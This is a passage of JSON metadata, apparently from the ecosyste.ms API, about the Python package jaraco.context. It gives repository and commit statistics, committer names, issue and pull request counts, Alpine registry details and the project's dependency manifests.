8Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2423,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2024-06-12T01:13:24.498Z","updated_at":"2024-06-12T01:13:24.498Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.20","url":"https://pkgs.alpinelinux.org/packages?branch=v3.20","ecosystem":"alpine","default":false,"packages_count":24162,"maintainers_count":405,"namespaces_count":2,"keywords_count":4251,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1543},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-06-07T11:51:39.915Z","updated_at":"2026-08-24T05:06:36.705Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/namespaces"}}],"commits":{"id":2481,"full_name":"jaraco/jaraco.context","default_branch":"main","total_commits":555,"total_committers":21,"total_bot_commits":0,"total_bot_committers":0,"mean_commits":26.428571428571427,"dds":0.10630630630630633,"past_year_total_commits":33,"past_year_total_committers":5,"past_year_total_bot_commits":0,"past_year_total_bot_committers":0,"past_year_mean_commits":6.6,"past_year_dds":0.24242424242424243,"last_synced_at":"2026-08-19T11:04:57.534Z","last_synced_commit":"bfcb95c784e110521fa907e890b2eea34b0ef349","created_at":"2023-03-07T09:14:39.997Z","updated_at":"2026-08-19T11:04:56.960Z","committers":[{"name":"Jason R. Coombs","email":"jaraco@jaraco.com","login":"jaraco","count":496},{"name":"Avasam","email":"samuel.06@hotmail.com","login":"Avasam","count":12},{"name":"Dimitri Papadopoulos Orfanos","email":"3234522+DimitriPapadopoulos","login":"DimitriPapadopoulos","count":11},{"name":"Anderson Bravalheri","email":"andersonbravalheri@gmail.com","login":"abravalheri","count":7},{"name":"Sviatoslav Sydorenko","email":"wk.cvs.github@sydorenko.org.ua","login":"webknjaz","count":6},{"name":"Hugo van Kemenade","email":"hugovk","login":"hugovk","count":4},{"name":"Bartosz Sławecki","email":"bartoszpiotrslawecki@gmail.com","login":"bswck","count":3},{"name":"Christian Clauss","email":"cclauss@me.com","login":"cclauss","count":2},{"name":"Copilot","email":"198982749+Copilot","login":"Copilot","count":2},{"name":"Alan Fregtman","email":"941331+darkvertex","login":"darkvertex","count":1},{"name":"Brian Rutledge","email":"brian@bhrutledge.com","login":"bhrutledge","count":1},{"name":"Joyce","email":"joycebrumu.u@gmail.com","login":"joycebrum","count":1},{"name":"KOLANICH","email":"kolan_n@mail.ru","login":"KOLANICH","count":1},{"name":"Lorenzo Bolla","email":"lorenzo.bolla@yougov.com","login":"lbolla","count":1},{"name":"Sebastian Kriems","email":"skriems","login":"skriems","count":1},{"name":"Vincent Fazio","email":"vfazio@xes-inc.com","login":"vfazio","count":1},{"name":"Zach Burnett","email":"zachary.r.burnett@gmail.com","login":"zacharyburnett","count":1},{"name":"johnthagen","email":"johnthagen","login":"johnthagen","count":1},{"name":"layday","email":"31134424+layday","login":"layday","count":1},{"name":"sT331h0rs3","email":"sT331h0rs3@gmail.com","login":"sT331h0rs3","count":1},{"name":"wim glenn","email":"wim.glenn@gmail.com","login":"wimglenn","count":1}],"past_year_committers":[{"name":"Jason R. Coombs","email":"jaraco@jaraco.com","login":"jaraco","count":25},{"name":"Avasam","email":"samuel.06@hotmail.com","login":"Avasam","count":3},{"name":"Dimitri Papadopoulos Orfanos","email":"3234522+DimitriPapadopoulos","login":"DimitriPapadopoulos","count":2},{"name":"Copilot","email":"198982749+Copilot","login":"Copilot","count":2},{"name":"sT331h0rs3","email":"sT331h0rs3@gmail.com","login":"sT331h0rs3","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-08-20T00:00:10.776Z","repositories_count":6752313,"commits_count":978410056,"contributors_count":41242979,"owners_count":1359078,"committers_count":3353170,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"jaraco/jaraco.context","html_url":"https://github.com/jaraco/jaraco.context","last_synced_at":"2026-08-24T13:38:08.182Z","status":null,"issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":0,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":0,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":null,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"created_at":"2023-05-10T16:49:24.489Z","updated_at":"2026-08-24T13:38:08.183Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","issue_labels_count":{"table":{}},"pull_request_labels_count":{"table":{}},"issue_author_associations_count":{"table":{"OWNER":6,"CONTRIBUTOR":3,"NONE":1}},"pull_request_author_associations_count":{"table":{"CONTRIBUTOR":4,"OWNER":3,"NONE":1}},"issue_authors":{"table":{"jaraco":6,"bswck":2,"Avasam":1,"LecrisUT":1}},"pull_request_authors":{"table":{"Avasam":4,"jaraco":3,"mgorny":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-08-25T00:00:09.459Z","repositories_count":16328808,"issues_count":42398313,"pull_requests_count":135865593,"authors_count":11520402,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{}},"past_year_pull_request_labels_count":{"table":{}},"past_year_issue_author_associations_count":{"table":{}},"past_year_pull_request_author_associations_count":{"table":{}},"past_year_issue_authors":{"table":{}},"past_year_pull_request_authors":{"table":{}},"maintainers":[{"table":{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}}],"active_maintainers":[]}},"events":{"total":{"ReleaseEvent":2,"PullRequestEvent":10,"ForkEvent":2,"IssuesEvent":6,"IssueCommentEvent":8,"PushEvent":20,"PullRequestReviewEvent":6,"PullRequestReviewCommentEvent":5,"CreateEvent":1},"last_year":{"ReleaseEvent":2,"PullRequestEvent":8,"ForkEvent":1,"IssuesEvent":6,"IssueCommentEvent":5,"PushEvent":13,"PullRequestReviewEvent":2,"PullRequestReviewCommentEvent":1,"CreateEvent":1}},"keywords":[],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/main.yml","sha":null,"kind":"manifest","created_at":"2023-02-11T06:45:38.159Z","updated_at":"2023-02-11T06:45:38.159Z","repository_link":"https://github.com/jaraco/jaraco.context/blob/main/.github/workflows/main.yml","dependencies":[{"id":7546987560,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":7546987561,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":7546987562,"package_name":"re-actors/alls-green","ecosystem":"actions","requirements":"release/v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"pypi","filepath":"pyproject.toml","sha":null,"kind":"manifest","created_at":"2023-12-01T02:38:00.091Z","updated_at":"2023-12-01T02:38:00.091Z","repository_link":"https://github.com/jaraco/jaraco.context/blob/main/pyproject.toml","dependencies":[]}],"score":26.715718943103845,"created_at":"2026-05-04T06:49:18.916Z","updated_at":"2026-08-25T14:08:32.247Z","avatar_url":"https://github.com/jaraco.png","language":"Python","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/371746","html_url":"https://summary.ecosyste.ms/projects/371746"}